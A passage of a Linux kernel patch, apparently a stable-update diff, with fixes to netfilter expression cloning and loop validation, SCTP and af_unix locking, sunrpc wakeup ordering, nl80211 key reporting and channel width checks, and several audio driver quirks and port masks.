++int nft_expr_clone(struct nft_expr *dst, struct nft_expr *src, gfp_t gfp)
+ {
+ 	int err;
+ 
+-	if (src->ops->clone) {
+-		dst->ops = src->ops;
+-		err = src->ops->clone(dst, src);
+-		if (err < 0)
+-			return err;
+-	} else {
+-		memcpy(dst, src, src->ops->size);
+-	}
++	if (WARN_ON_ONCE(!src->ops->clone))
++		return -EINVAL;
++
++	dst->ops = src->ops;
++	err = src->ops->clone(dst, src, gfp);
++	if (err < 0)
++		return err;
+ 
+ 	__module_get(src->ops->type->owner);
+ 
+@@ -3516,6 +3515,15 @@ static void nf_tables_rule_release(const struct nft_ctx *ctx, struct nft_rule *r
+ 	nf_tables_rule_destroy(ctx, rule);
+ }
+ 
++/** nft_chain_validate - loop detection and hook validation
++ *
++ * @ctx: context containing call depth and base chain
++ * @chain: chain to validate
++ *
++ * Walk through the rules of the given chain and chase all jumps/gotos
++ * and set lookups until either the jump limit is hit or all reachable
++ * chains have been validated.
++ */
+ int nft_chain_validate(const struct nft_ctx *ctx, const struct nft_chain *chain)
+ {
+ 	struct nft_expr *expr, *last;
+@@ -3534,6 +3542,9 @@ int nft_chain_validate(const struct nft_ctx *ctx, const struct nft_chain *chain)
+ 			if (!expr->ops->validate)
+ 				continue;
+ 
++			/* This may call nft_chain_validate() recursively,
++			 * callers that do so must increment ctx->level.
++			 */
+ 			err = expr->ops->validate(ctx, expr, &data);
+ 			if (err < 0)
+ 				return err;
+@@ -6060,7 +6071,7 @@ int nft_set_elem_expr_clone(const struct nft_ctx *ctx, struct nft_set *set,
+ 		if (!expr)
+ 			goto err_expr;
+ 
+-		err = nft_expr_clone(expr, set->exprs[i]);
++		err = nft_expr_clone(expr, set->exprs[i], GFP_KERNEL_ACCOUNT);
+ 		if (err < 0) {
+ 			kfree(expr);
+ 			goto err_expr;
+@@ -6099,7 +6110,7 @@ static int nft_set_elem_expr_setup(struct nft_ctx *ctx,
+ 
+ 	for (i = 0; i < num_exprs; i++) {
+ 		expr = nft_setelem_expr_at(elem_expr, elem_expr->size);
+-		err = nft_expr_clone(expr, expr_array[i]);
++		err = nft_expr_clone(expr, expr_array[i], GFP_KERNEL_ACCOUNT);
+ 		if (err < 0)
+ 			goto err_elem_expr_setup;
+ 
+@@ -10191,143 +10202,6 @@ int nft_chain_validate_hooks(const struct nft_chain *chain,
+ }
+ EXPORT_SYMBOL_GPL(nft_chain_validate_hooks);
+ 
+-/*
+- * Loop detection - walk through the ruleset beginning at the destination chain
+- * of a new jump until either the source chain is reached (loop) or all
+- * reachable chains have been traversed.
+- *
+- * The loop check is performed whenever a new jump verdict is added to an
+- * expression or verdict map or a verdict map is bound to a new chain.
+- */
+-
+-static int nf_tables_check_loops(const struct nft_ctx *ctx,
+-				 const struct nft_chain *chain);
+-
+-static int nft_check_loops(const struct nft_ctx *ctx,
+-			   const struct nft_set_ext *ext)
+-{
+-	const struct nft_data *data;
+-	int ret;
+-
+-	data = nft_set_ext_data(ext);
+-	switch (data->verdict.code) {
+-	case NFT_JUMP:
+-	case NFT_GOTO:
+-		ret = nf_tables_check_loops(ctx, data->verdict.chain);
+-		break;
+-	default:
+-		ret = 0;
+-		break;
+-	}
+-
+-	return ret;
+-}
+-
+-static int nf_tables_loop_check_setelem(const struct nft_ctx *ctx,
+-					struct nft_set *set,
+-					const struct nft_set_iter *iter,
+-					struct nft_set_elem *elem)
+-{
+-	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
+-
+-	if (nft_set_ext_exists(ext, NFT_SET_EXT_FLAGS) &&
+-	    *nft_set_ext_flags(ext) & NFT_SET_ELEM_INTERVAL_END)
+-		return 0;
+-
+-	return nft_check_loops(ctx, ext);
+-}
+-
+-static int nft_set_catchall_loops(const struct nft_ctx *ctx,
+-				  struct nft_set *set)
+-{
+-	u8 genmask = nft_genmask_next(ctx->net);
+-	struct nft_set_elem_catchall *catchall;
+-	struct nft_set_ext *ext;
+-	int ret = 0;
+-
+-	list_for_each_entry_rcu(catchall, &set->catchall_list, list) {
+-		ext = nft_set_elem_ext(set, catchall->elem);
+-		if (!nft_set_elem_active(ext, genmask))
+-			continue;
+-
+-		ret = nft_check_loops(ctx, ext);
+-		if (ret < 0)
+-			return ret;
+-	}
+-
+-	return ret;
+-}
+-
+-static int nf_tables_check_loops(const struct nft_ctx *ctx,
+-				 const struct nft_chain *chain)
+-{
+-	const struct nft_rule *rule;
+-	const struct nft_expr *expr, *last;
+-	struct nft_set *set;
+-	struct nft_set_binding *binding;
+-	struct nft_set_iter iter;
+-
+-	if (ctx->chain == chain)
+-		return -ELOOP;
+-
+-	list_for_each_entry(rule, &chain->rules, list) {
+-		nft_rule_for_each_expr(expr, last, rule) {
+-			struct nft_immediate_expr *priv;
+-			const struct nft_data *data;
+-			int err;
+-
+-			if (strcmp(expr->ops->type->name, "immediate"))
+-				continue;
+-
+-			priv = nft_expr_priv(expr);
+-			if (priv->dreg != NFT_REG_VERDICT)
+-				continue;
+-
+-			data = &priv->data;
+-			switch (data->verdict.code) {
+-			case NFT_JUMP:
+-			case NFT_GOTO:
+-				err = nf_tables_check_loops(ctx,
+-							data->verdict.chain);
+-				if (err < 0)
+-					return err;
+-				break;
+-			default:
+-				break;
+-			}
+-		}
+-	}
+-
+-	list_for_each_entry(set, &ctx->table->sets, list) {
+-		if (!nft_is_active_next(ctx->net, set))
+-			continue;
+-		if (!(set->flags & NFT_SET_MAP) ||
+-		    set->dtype != NFT_DATA_VERDICT)
+-			continue;
+-
+-		list_for_each_entry(binding, &set->bindings, list) {
+-			if (!(binding->flags & NFT_SET_MAP) ||
+-			    binding->chain != chain)
+-				continue;
+-
+-			iter.genmask	= nft_genmask_next(ctx->net);
+-			iter.skip 	= 0;
+-			iter.count	= 0;
+-			iter.err	= 0;
+-			iter.fn		= nf_tables_loop_check_setelem;
+-
+-			set->ops->walk(ctx, set, &iter);
+-			if (!iter.err)
+-				iter.err = nft_set_catchall_loops(ctx, set);
+-
+-			if (iter.err < 0)
+-				return iter.err;
+-		}
+-	}
+-
+-	return 0;
+-}
+-
+ /**
+  *	nft_parse_u32_check - fetch u32 attribute and check for maximum value
+  *
+@@ -10440,7 +10314,7 @@ static int nft_validate_register_store(const struct nft_ctx *ctx,
+ 		if (data != NULL &&
+ 		    (data->verdict.code == NFT_GOTO ||
+ 		     data->verdict.code == NFT_JUMP)) {
+-			err = nf_tables_check_loops(ctx, data->verdict.chain);
++			err = nft_chain_validate(ctx, data->verdict.chain);
+ 			if (err < 0)
+ 				return err;
+ 		}
+diff --git a/net/netfilter/nft_connlimit.c b/net/netfilter/nft_connlimit.c
+index d657f999a11b6..793994622b87d 100644
+--- a/net/netfilter/nft_connlimit.c
++++ b/net/netfilter/nft_connlimit.c
+@@ -209,12 +209,12 @@ static void nft_connlimit_destroy(const struct nft_ctx *ctx,
+ 	nft_connlimit_do_destroy(ctx, priv);
+ }
+ 
+-static int nft_connlimit_clone(struct nft_expr *dst, const struct nft_expr *src)
++static int nft_connlimit_clone(struct nft_expr *dst, const struct nft_expr *src, gfp_t gfp)
+ {
+ 	struct nft_connlimit *priv_dst = nft_expr_priv(dst);
+ 	struct nft_connlimit *priv_src = nft_expr_priv(src);
+ 
+-	priv_dst->list = kmalloc(sizeof(*priv_dst->list), GFP_ATOMIC);
++	priv_dst->list = kmalloc(sizeof(*priv_dst->list), gfp);
+ 	if (!priv_dst->list)
+ 		return -ENOMEM;
+ 
+diff --git a/net/netfilter/nft_counter.c b/net/netfilter/nft_counter.c
+index f4d3573e8782d..b5fe7fe4b60db 100644
+--- a/net/netfilter/nft_counter.c
++++ b/net/netfilter/nft_counter.c
+@@ -225,7 +225,7 @@ static void nft_counter_destroy(const struct nft_ctx *ctx,
+ 	nft_counter_do_destroy(priv);
+ }
+ 
+-static int nft_counter_clone(struct nft_expr *dst, const struct nft_expr *src)
++static int nft_counter_clone(struct nft_expr *dst, const struct nft_expr *src, gfp_t gfp)
+ {
+ 	struct nft_counter_percpu_priv *priv = nft_expr_priv(src);
+ 	struct nft_counter_percpu_priv *priv_clone = nft_expr_priv(dst);
+@@ -235,7 +235,7 @@ static int nft_counter_clone(struct nft_expr *dst, const struct nft_expr *src)
+ 
+ 	nft_counter_fetch(priv, &total);
+ 
+-	cpu_stats = alloc_percpu_gfp(struct nft_counter, GFP_ATOMIC);
++	cpu_stats = alloc_percpu_gfp(struct nft_counter, gfp);
+ 	if (cpu_stats == NULL)
+ 		return -ENOMEM;
+ 
+diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
+index a470e5f612843..953aba871f45c 100644
+--- a/net/netfilter/nft_dynset.c
++++ b/net/netfilter/nft_dynset.c
+@@ -35,7 +35,7 @@ static int nft_dynset_expr_setup(const struct nft_dynset *priv,
+ 
+ 	for (i = 0; i < priv->num_exprs; i++) {
+ 		expr = nft_setelem_expr_at(elem_expr, elem_expr->size);
+-		if (nft_expr_clone(expr, priv->expr_array[i]) < 0)
++		if (nft_expr_clone(expr, priv->expr_array[i], GFP_ATOMIC) < 0)
+ 			return -1;
+ 
+ 		elem_expr->size += priv->expr_array[i]->ops->size;
+diff --git a/net/netfilter/nft_last.c b/net/netfilter/nft_last.c
+index eaa54964cf23c..2ff387b649cfc 100644
+--- a/net/netfilter/nft_last.c
++++ b/net/netfilter/nft_last.c
+@@ -101,12 +101,12 @@ static void nft_last_destroy(const struct nft_ctx *ctx,
+ 	kfree(priv->last);
+ }
+ 
+-static int nft_last_clone(struct nft_expr *dst, const struct nft_expr *src)
++static int nft_last_clone(struct nft_expr *dst, const struct nft_expr *src, gfp_t gfp)
+ {
+ 	struct nft_last_priv *priv_dst = nft_expr_priv(dst);
+ 	struct nft_last_priv *priv_src = nft_expr_priv(src);
+ 
+-	priv_dst->last = kzalloc(sizeof(*priv_dst->last), GFP_ATOMIC);
++	priv_dst->last = kzalloc(sizeof(*priv_dst->last), gfp);
+ 	if (!priv_dst->last)
+ 		return -ENOMEM;
+ 
+diff --git a/net/netfilter/nft_limit.c b/net/netfilter/nft_limit.c
+index 36ded7d43262c..a263596da99ac 100644
+--- a/net/netfilter/nft_limit.c
++++ b/net/netfilter/nft_limit.c
+@@ -150,7 +150,7 @@ static void nft_limit_destroy(const struct nft_ctx *ctx,
+ }
+ 
+ static int nft_limit_clone(struct nft_limit_priv *priv_dst,
+-			   const struct nft_limit_priv *priv_src)
++			   const struct nft_limit_priv *priv_src, gfp_t gfp)
+ {
+ 	priv_dst->tokens_max = priv_src->tokens_max;
+ 	priv_dst->rate = priv_src->rate;
+@@ -158,7 +158,7 @@ static int nft_limit_clone(struct nft_limit_priv *priv_dst,
+ 	priv_dst->burst = priv_src->burst;
+ 	priv_dst->invert = priv_src->invert;
+ 
+-	priv_dst->limit = kmalloc(sizeof(*priv_dst->limit), GFP_ATOMIC);
++	priv_dst->limit = kmalloc(sizeof(*priv_dst->limit), gfp);
+ 	if (!priv_dst->limit)
+ 		return -ENOMEM;
+ 
+@@ -222,14 +222,15 @@ static void nft_limit_pkts_destroy(const struct nft_ctx *ctx,
+ 	nft_limit_destroy(ctx, &priv->limit);
+ }
+ 
+-static int nft_limit_pkts_clone(struct nft_expr *dst, const struct nft_expr *src)
++static int nft_limit_pkts_clone(struct nft_expr *dst, const struct nft_expr *src,
++				gfp_t gfp)
+ {
+ 	struct nft_limit_priv_pkts *priv_dst = nft_expr_priv(dst);
+ 	struct nft_limit_priv_pkts *priv_src = nft_expr_priv(src);
+ 
+ 	priv_dst->cost = priv_src->cost;
+ 
+-	return nft_limit_clone(&priv_dst->limit, &priv_src->limit);
++	return nft_limit_clone(&priv_dst->limit, &priv_src->limit, gfp);
+ }
+ 
+ static struct nft_expr_type nft_limit_type;
+@@ -280,12 +281,13 @@ static void nft_limit_bytes_destroy(const struct nft_ctx *ctx,
+ 	nft_limit_destroy(ctx, priv);
+ }
+ 
+-static int nft_limit_bytes_clone(struct nft_expr *dst, const struct nft_expr *src)
++static int nft_limit_bytes_clone(struct nft_expr *dst, const struct nft_expr *src,
++				 gfp_t gfp)
+ {
+ 	struct nft_limit_priv *priv_dst = nft_expr_priv(dst);
+ 	struct nft_limit_priv *priv_src = nft_expr_priv(src);
+ 
+-	return nft_limit_clone(priv_dst, priv_src);
++	return nft_limit_clone(priv_dst, priv_src, gfp);
+ }
+ 
+ static const struct nft_expr_ops nft_limit_bytes_ops = {
+diff --git a/net/netfilter/nft_quota.c b/net/netfilter/nft_quota.c
+index 410a5fcf88309..ef8e7cdbd0e6a 100644
+--- a/net/netfilter/nft_quota.c
++++ b/net/netfilter/nft_quota.c
+@@ -232,7 +232,7 @@ static void nft_quota_destroy(const struct nft_ctx *ctx,
+ 	return nft_quota_do_destroy(ctx, priv);
+ }
+ 
+-static int nft_quota_clone(struct nft_expr *dst, const struct nft_expr *src)
++static int nft_quota_clone(struct nft_expr *dst, const struct nft_expr *src, gfp_t gfp)
+ {
+ 	struct nft_quota *priv_dst = nft_expr_priv(dst);
+ 	struct nft_quota *priv_src = nft_expr_priv(src);
+@@ -240,7 +240,7 @@ static int nft_quota_clone(struct nft_expr *dst, const struct nft_expr *src)
+ 	priv_dst->quota = priv_src->quota;
+ 	priv_dst->flags = priv_src->flags;
+ 
+-	priv_dst->consumed = kmalloc(sizeof(*priv_dst->consumed), GFP_ATOMIC);
++	priv_dst->consumed = kmalloc(sizeof(*priv_dst->consumed), gfp);
+ 	if (!priv_dst->consumed)
+ 		return -ENOMEM;
+ 
+diff --git a/net/sctp/input.c b/net/sctp/input.c
+index 4f43afa8678f9..4ee9374dcfb92 100644
+--- a/net/sctp/input.c
++++ b/net/sctp/input.c
+@@ -748,15 +748,19 @@ static int __sctp_hash_endpoint(struct sctp_endpoint *ep)
+ 	struct sock *sk = ep->base.sk;
+ 	struct net *net = sock_net(sk);
+ 	struct sctp_hashbucket *head;
++	int err = 0;
+ 
+ 	ep->hashent = sctp_ep_hashfn(net, ep->base.bind_addr.port);
+ 	head = &sctp_ep_hashtable[ep->hashent];
+ 
++	write_lock(&head->lock);
+ 	if (sk->sk_reuseport) {
+ 		bool any = sctp_is_ep_boundall(sk);
+ 		struct sctp_endpoint *ep2;
+ 		struct list_head *list;
+-		int cnt = 0, err = 1;
++		int cnt = 0;
++
++		err = 1;
+ 
+ 		list_for_each(list, &ep->base.bind_addr.address_list)
+ 			cnt++;
+@@ -774,24 +778,24 @@ static int __sctp_hash_endpoint(struct sctp_endpoint *ep)
+ 			if (!err) {
+ 				err = reuseport_add_sock(sk, sk2, any);
+ 				if (err)
+-					return err;
++					goto out;
+ 				break;
+ 			} else if (err < 0) {
+-				return err;
++				goto out;
+ 			}
+ 		}
+ 
+ 		if (err) {
+ 			err = reuseport_alloc(sk, any);
+ 			if (err)
+-				return err;
++				goto out;
+ 		}
+ 	}
+ 
+-	write_lock(&head->lock);
+ 	hlist_add_head(&ep->node, &head->chain);
++out:
+ 	write_unlock(&head->lock);
+-	return 0;
++	return err;
+ }
+ 
+ /* Add an endpoint to the hash. Local BH-safe. */
+@@ -816,10 +820,9 @@ static void __sctp_unhash_endpoint(struct sctp_endpoint *ep)
+ 
+ 	head = &sctp_ep_hashtable[ep->hashent];
+ 
++	write_lock(&head->lock);
+ 	if (rcu_access_pointer(sk->sk_reuseport_cb))
+ 		reuseport_detach_sock(sk);
+-
+-	write_lock(&head->lock);
+ 	hlist_del_init(&ep->node);
+ 	write_unlock(&head->lock);
+ }
+diff --git a/net/sunrpc/sched.c b/net/sunrpc/sched.c
+index 6debf4fd42d4e..cef623ea15060 100644
+--- a/net/sunrpc/sched.c
++++ b/net/sunrpc/sched.c
+@@ -369,8 +369,10 @@ static void rpc_make_runnable(struct workqueue_struct *wq,
+ 	if (RPC_IS_ASYNC(task)) {
+ 		INIT_WORK(&task->u.tk_work, rpc_async_schedule);
+ 		queue_work(wq, &task->u.tk_work);
+-	} else
++	} else {
++		smp_mb__after_atomic();
+ 		wake_up_bit(&task->tk_runstate, RPC_TASK_QUEUED);
++	}
+ }
+ 
+ /*
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index db71f35b67b86..7d59f9a6c9046 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -1461,6 +1461,7 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 	struct unix_sock *u = unix_sk(sk), *newu, *otheru;
+ 	struct net *net = sock_net(sk);
+ 	struct sk_buff *skb = NULL;
++	unsigned char state;
+ 	long timeo;
+ 	int err;
+ 
+@@ -1505,7 +1506,6 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 		goto out;
+ 	}
+ 
+-	/* Latch state of peer */
+ 	unix_state_lock(other);
+ 
+ 	/* Apparently VFS overslept socket death. Retry. */
+@@ -1535,37 +1535,21 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 		goto restart;
+ 	}
+ 
+-	/* Latch our state.
+-
+-	   It is tricky place. We need to grab our state lock and cannot
+-	   drop lock on peer. It is dangerous because deadlock is
+-	   possible. Connect to self case and simultaneous
+-	   attempt to connect are eliminated by checking socket
+-	   state. other is TCP_LISTEN, if sk is TCP_LISTEN we
+-	   check this before attempt to grab lock.
+-
+-	   Well, and we have to recheck the state after socket locked.
++	/* self connect and simultaneous connect are eliminated
++	 * by rejecting TCP_LISTEN socket to avoid deadlock.
+ 	 */
+-	switch (READ_ONCE(sk->sk_state)) {
+-	case TCP_CLOSE:
+-		/* This is ok... continue with connect */
+-		break;
+-	case TCP_ESTABLISHED:
+-		/* Socket is already connected */
+-		err = -EISCONN;
+-		goto out_unlock;
+-	default:
+-		err = -EINVAL;
++	state = READ_ONCE(sk->sk_state);
++	if (unlikely(state != TCP_CLOSE)) {
++		err = state == TCP_ESTABLISHED ? -EISCONN : -EINVAL;
+ 		goto out_unlock;
+ 	}
+ 
+ 	unix_state_lock_nested(sk, U_LOCK_SECOND);
+ 
+-	if (sk->sk_state != TCP_CLOSE) {
++	if (unlikely(sk->sk_state != TCP_CLOSE)) {
++		err = sk->sk_state == TCP_ESTABLISHED ? -EISCONN : -EINVAL;
+ 		unix_state_unlock(sk);
+-		unix_state_unlock(other);
+-		sock_put(other);
+-		goto restart;
++		goto out_unlock;
+ 	}
+ 
+ 	err = security_unix_stream_connect(sk, other, newsk);
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index a00df7b89ca86..214eee6105c7f 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -3346,6 +3346,33 @@ static int __nl80211_set_channel(struct cfg80211_registered_device *rdev,
+ 			if (chandef.chan != cur_chan)
+ 				return -EBUSY;
+ 
++			/* only allow this for regular channel widths */
++			switch (wdev->links[link_id].ap.chandef.width) {
++			case NL80211_CHAN_WIDTH_20_NOHT:
++			case NL80211_CHAN_WIDTH_20:
++			case NL80211_CHAN_WIDTH_40:
++			case NL80211_CHAN_WIDTH_80:
++			case NL80211_CHAN_WIDTH_80P80:
++			case NL80211_CHAN_WIDTH_160:
++			case NL80211_CHAN_WIDTH_320:
++				break;
++			default:
++				return -EINVAL;
++			}
++
++			switch (chandef.width) {
++			case NL80211_CHAN_WIDTH_20_NOHT:
++			case NL80211_CHAN_WIDTH_20:
++			case NL80211_CHAN_WIDTH_40:
++			case NL80211_CHAN_WIDTH_80:
++			case NL80211_CHAN_WIDTH_80P80:
++			case NL80211_CHAN_WIDTH_160:
++			case NL80211_CHAN_WIDTH_320:
++				break;
++			default:
++				return -EINVAL;
++			}
++
+ 			result = rdev_set_ap_chanwidth(rdev, dev, link_id,
+ 						       &chandef);
+ 			if (result)
+@@ -4394,10 +4421,7 @@ static void get_key_callback(void *c, struct key_params *params)
+ 	struct nlattr *key;
+ 	struct get_key_cookie *cookie = c;
+ 
+-	if ((params->key &&
+-	     nla_put(cookie->msg, NL80211_ATTR_KEY_DATA,
+-		     params->key_len, params->key)) ||
+-	    (params->seq &&
++	if ((params->seq &&
+ 	     nla_put(cookie->msg, NL80211_ATTR_KEY_SEQ,
+ 		     params->seq_len, params->seq)) ||
+ 	    (params->cipher &&
+@@ -4409,10 +4433,7 @@ static void get_key_callback(void *c, struct key_params *params)
+ 	if (!key)
+ 		goto nla_put_failure;
+ 
+-	if ((params->key &&
+-	     nla_put(cookie->msg, NL80211_KEY_DATA,
+-		     params->key_len, params->key)) ||
+-	    (params->seq &&
++	if ((params->seq &&
+ 	     nla_put(cookie->msg, NL80211_KEY_SEQ,
+ 		     params->seq_len, params->seq)) ||
+ 	    (params->cipher &&
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index f460ac80c8e49..0ffacc779cd66 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -1989,6 +1989,8 @@ static int hdmi_add_cvt(struct hda_codec *codec, hda_nid_t cvt_nid)
+ }
+ 
+ static const struct snd_pci_quirk force_connect_list[] = {
++	SND_PCI_QUIRK(0x103c, 0x83e2, "HP EliteDesk 800 G4", 1),
++	SND_PCI_QUIRK(0x103c, 0x83ef, "HP MP9 G4 Retail System AMS", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x870f, "HP", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x871a, "HP", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x8711, "HP", 1),
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index edfcd38175d23..93d65a1acc475 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -10173,6 +10173,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x8086, 0x3038, "Intel NUC 13", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0xf111, 0x0001, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0xf111, 0x0006, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0xf111, 0x0009, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+ 
+ #if 0
+ 	/* Below is a quirk table taken from the old code.
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index c438fccac8e98..b4a40a880035c 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -381,6 +381,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "8A43"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8A44"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/wcd938x-sdw.c b/sound/soc/codecs/wcd938x-sdw.c
+index 5b5b7c267a616..061c77d0cd45b 100644
+--- a/sound/soc/codecs/wcd938x-sdw.c
++++ b/sound/soc/codecs/wcd938x-sdw.c
+@@ -1252,12 +1252,12 @@ static int wcd9380_probe(struct sdw_slave *pdev,
+ 	pdev->prop.lane_control_support = true;
+ 	pdev->prop.simple_clk_stop_capable = true;
+ 	if (wcd->is_tx) {
+-		pdev->prop.source_ports = GENMASK(WCD938X_MAX_SWR_PORTS, 0);
++		pdev->prop.source_ports = GENMASK(WCD938X_MAX_SWR_PORTS - 1, 0);
+ 		pdev->prop.src_dpn_prop = wcd938x_dpn_prop;
+ 		wcd->ch_info = &wcd938x_sdw_tx_ch_info[0];
+ 		pdev->prop.wake_capable = true;
+ 	} else {
+-		pdev->prop.sink_ports = GENMASK(WCD938X_MAX_SWR_PORTS, 0);
++		pdev->prop.sink_ports = GENMASK(WCD938X_MAX_SWR_PORTS - 1, 0);
+ 		pdev->prop.sink_dpn_prop = wcd938x_dpn_prop;
+ 		wcd->ch_info = &wcd938x_sdw_rx_ch_info[0];
+ 	}
+diff --git a/sound/soc/codecs/wsa881x.c b/sound/soc/codecs/wsa881x.c
+index 264ec05a3c675..054da9d2776cd 100644
+--- a/sound/soc/codecs/wsa881x.c
++++ b/sound/soc/codecs/wsa881x.c
+@@ -1131,7 +1131,7 @@ static int wsa881x_probe(struct sdw_slave *pdev,
+ 	wsa881x->sconfig.frame_rate = 48000;
+ 	wsa881x->sconfig.direction = SDW_DATA_DIR_RX;
+ 	wsa881x->sconfig.type = SDW_STREAM_PDM;
+-	pdev->prop.sink_ports = GENMASK(WSA881X_MAX_SWR_PORTS, 0);
++	pdev->prop.sink_ports = GENMASK(WSA881X_MAX_SWR_PORTS - 1, 0);
+ 	pdev->prop.sink_dpn_prop = wsa_sink_dpn_prop;
+ 	pdev->prop.scp_int1_mask = SDW_SCP_INT1_BUS_CLASH | SDW_SCP_INT1_PARITY;
+ 	gpiod_direction_output(wsa881x->sd_n, 1);
+diff --git a/sound/soc/codecs/wsa883x.c b/sound/soc/codecs/wsa883x.c
+index cd96c35a150c8..f4b81ebab3537 100644
+--- a/sound/soc/codecs/wsa883x.c
++++ b/sound/soc/codecs/wsa883x.c
+@@ -1410,7 +1410,15 @@ static int wsa883x_probe(struct sdw_slave *pdev,
+ 	wsa883x->sconfig.direction = SDW_DATA_DIR_RX;
+ 	wsa883x->sconfig.type = SDW_STREAM_PDM;
+ 
+-	pdev->prop.sink_ports = GENMASK(WSA883X_MAX_SWR_PORTS, 0);
++	/**
++	 * Port map index starts with 0, however the data port for this codec
++	 * are from index 1
++	 */
++	if (of_property_read_u32_array(dev->of_node, "qcom,port-mapping", &pdev->m_port_map[1],
++					WSA883X_MAX_SWR_PORTS))
++		dev_dbg(dev, "Static Port mapping not specified\n");
++
++	pdev->prop.sink_ports = GENMASK(WSA883X_MAX_SWR_PORTS - 1, 0);
+ 	pdev->prop.simple_clk_stop_capable = true;
+ 	pdev->prop.sink_dpn_prop = wsa_sink_dpn_prop;
+ 	pdev->prop.scp_int1_mask = SDW_SCP_INT1_BUS_CLASH | SDW_SCP_INT1_PARITY;
+diff --git a/sound/soc/meson/axg-fifo.c b/sound/soc/meson/axg-fifo.c
+index 94b169a5493b5..5218e40aeb1bb 100644
+--- a/sound/soc/meson/axg-fifo.c
++++ b/sound/soc/meson/axg-fifo.c
+@@ -207,25 +207,18 @@ static irqreturn_t axg_fifo_pcm_irq_block(int irq, void *dev_id)
+ 	status = FIELD_GET(STATUS1_INT_STS, status);
+ 	axg_fifo_ack_irq(fifo, status);
+ 
+-	/* Use the thread to call period elapsed on nonatomic links */
+-	if (status & FIFO_INT_COUNT_REPEAT)
+-		return IRQ_WAKE_THREAD;
++	if (status & ~FIFO_INT_COUNT_REPEAT)
++		dev_dbg(axg_fifo_dev(ss), "unexpected irq - STS 0x%02x\n",
++			status);
+ 
+-	dev_dbg(axg_fifo_dev(ss), "unexpected irq - STS 0x%02x\n",
+-		status);
++	if (status & FIFO_INT_COUNT_REPEAT) {
++		snd_pcm_period_elapsed(ss);
++		return IRQ_HANDLED;
++	}
+ 
+ 	return IRQ_NONE;
+ }
+ 
+-static irqreturn_t axg_fifo_pcm_irq_block_thread(int irq, void *dev_id)
+-{
+-	struct snd_pcm_substream *ss = dev_id;
+-
+-	snd_pcm_period_elapsed(ss);
+-
+-	return IRQ_HANDLED;
+-}
+-
+ int axg_fifo_pcm_open(struct snd_soc_component *component,
+ 		      struct snd_pcm_substream *ss)
+ {
+@@ -251,8 +244,9 @@ int axg_fifo_pcm_open(struct snd_soc_component *component,
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = request_threaded_irq(fifo->irq, axg_fifo_pcm_irq_block,
+-				   axg_fifo_pcm_irq_block_thread,
++	/* Use the threaded irq handler only with non-atomic links */
++	ret = request_threaded_irq(fifo->irq, NULL,
++				   axg_fifo_pcm_irq_block,
+ 				   IRQF_ONESHOT, dev_name(dev), ss);
+ 	if (ret)
+ 		return ret;
+diff --git a/sound/soc/sof/mediatek/mt8195/mt8195.c b/sound/soc/sof/mediatek/mt8195/mt8195.c
+index 3c81e84fcecfa..53cadbe8a05cc 100644
+--- a/sound/soc/sof/mediatek/mt8195/mt8195.c
++++ b/sound/soc/sof/mediatek/mt8195/mt8195.c
+@@ -662,7 +662,7 @@ static struct snd_sof_dsp_ops sof_mt8195_ops = {
+ static struct snd_sof_of_mach sof_mt8195_machs[] = {
+ 	{
+ 		.compatible = "google,tomato",
+-		.sof_tplg_filename = "sof-mt8195-mt6359-rt1019-rt5682-dts.tplg"
++		.sof_tplg_filename = "sof-mt8195-mt6359-rt1019-rt5682.tplg"
+ 	}, {
+ 		.compatible = "mediatek,mt8195",
+ 		.sof_tplg_filename = "sof-mt8195.tplg"
+diff --git a/sound/usb/line6/driver.c b/sound/usb/line6/driver.c
+index f4437015d43a7..9df49a880b750 100644
+--- a/sound/usb/line6/driver.c
++++ b/sound/usb/line6/driver.c
+@@ -286,12 +286,14 @@ static void line6_data_received(struct urb *urb)
+ {
+ 	struct usb_line6 *line6 = (struct usb_line6 *)urb->context;
+ 	struct midi_buffer *mb = &line6->line6midi->midibuf_in;
++	unsigned long flags;
+ 	int done;
+ 
+ 	if (urb->status == -ESHUTDOWN)
+ 		return;
+ 
+ 	if (line6->properties->capabilities & LINE6_CAP_CONTROL_MIDI) {
++		spin_lock_irqsave(&line6->line6midi->lock, flags);
+ 		done =
+ 			line6_midibuf_write(mb, urb->transfer_buffer, urb->actual_length);
+ 
